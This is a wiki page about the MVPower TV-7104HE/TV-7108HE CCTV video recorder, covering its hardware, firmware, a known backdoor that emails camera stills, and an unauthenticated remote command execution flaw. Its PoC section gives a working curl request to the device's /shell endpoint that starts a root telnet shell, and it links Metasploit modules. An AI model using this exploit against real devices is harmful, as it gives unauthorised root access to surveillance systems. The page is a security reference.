Bcoles: Created page with "FORCETOC {{Disclaimer}} 160px Category:DVR = MVPower DVR = MVPower DVR is a HDMI Full 960H H.264 real-time standalone..."

2017-11-26T07:35:42Z

Created page with "__FORCETOC__ {{Disclaimer}} left|thumb|160px Category:DVR = MVPower DVR = MVPower DVR is a HDMI Full 960H H.264 real-time standalone..."

New page

__FORCETOC__
{{Disclaimer}}
[[File:Mvpower-TV-7104HE-front.jpg|left|thumb|160px]]
[[Category:DVR]]

= MVPower DVR =

MVPower DVR is a HDMI Full 960H H.264 real-time standalone network CCTV Digital Video Recorder available in 4 and 8 channel models (TV-7104HE / TV-7108HE).

== Hardware ==
* Video System: PAL
* Video Compression: H.264
* Video Input: BNC 4 Channel or 8 Channel
* Video Output: 1 Channel BNC/VGA
* Storage Interface Type: SATA
* Max Capacity: Up to 2TB HDD (not included)
* USB Interface: USB 2.0

== Firmware ==

An unofficial fork of the firmware was identified on GitHub. It has since been removed, however [https://github.com/cybergibbons/ipc a fork is available].

== Teardown ==

You can find an excellent teardown of the MVPower DVR at [https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/ labby.co.uk].

== Backdoor ==

It's worth noting that this device contains a [https://www.pentestpartners.com/blog/pwning-cctv-cameras/ known backdoor] which sends still images from the connected cameras to an email address assumed to be maintained by the firmware developer - lawishere@yeah.net.

== Remote Command Execution ==

The web interface contains legacy debugging functionality which does not require authentication and allows trivial remote command execution as root. No patch is available.

The first known report of this issue is from Paul Davies from UHF-Satcom in a comment on the [https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/ labby.co.uk blog] in August 2015.

The TV-7104HE and TV-7108HE models are known to be vulnerable, however it's likely that other models are also affected. The vulnerability was successfully exploited in firmware version 1.8.4 115215B9 (Build 2014/11/17).

=== PoC ===

<pre style="white-space: pre-wrap;">
# Start the telnet daemon on port 443
curl -i "http://<IP>/shell?telnetd+-l+/bin/sh+-p+443" -H "Connection: Keep-Alive"
# Telnet to the newly started telnet daemon
telnet <IP> 443
</pre>

=== Exploits ===

* [https://www.rapid7.com/db/modules/exploit/linux/http/mvpower_dvr_shell_exec An official Metasploit module] is available to gain a remote meterpreter shell as root.

* [https://gist.github.com/bcoles/f4f528fa67c887d157be95d60d7fc9d2 An unofficial Metasploit module] exists which gains a remote root shell by starting the telnet daemon on a specified port.

== Gallery ==
<gallery>
File:Mvpower-TV-7104HE-front.jpg
File:Mvpower-TV-7104HE-back.jpg
File:Mvpower-TV-7104HE-board.jpg
</gallery>

== Links ==

* [https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/ Cheap DVR teardown and pinout (MVPower, Hi3520D_v1.95p) – Labby.co.uk]
* [https://www.pentestpartners.com/blog/pwning-cctv-cameras/ Pwning CCTV cameras | Pen Test Partners]
* [http://convictech.blogspot.com/2016/01/mvpower-hd-cctv-camera-security-system.html ConvicTech: MVPower 4-Channel HD CCTV Camera Security System from Aukey E-Business]

MVPower DVR - Revision history

Bcoles: Created page with "__FORCETOC__ {{Disclaimer}} 160px Category:DVR = MVPower DVR = MVPower DVR is a HDMI Full 960H H.264 real-time standalone..."

Bcoles: Created page with "FORCETOC {{Disclaimer}} 160px Category:DVR = MVPower DVR = MVPower DVR is a HDMI Full 960H H.264 real-time standalone..."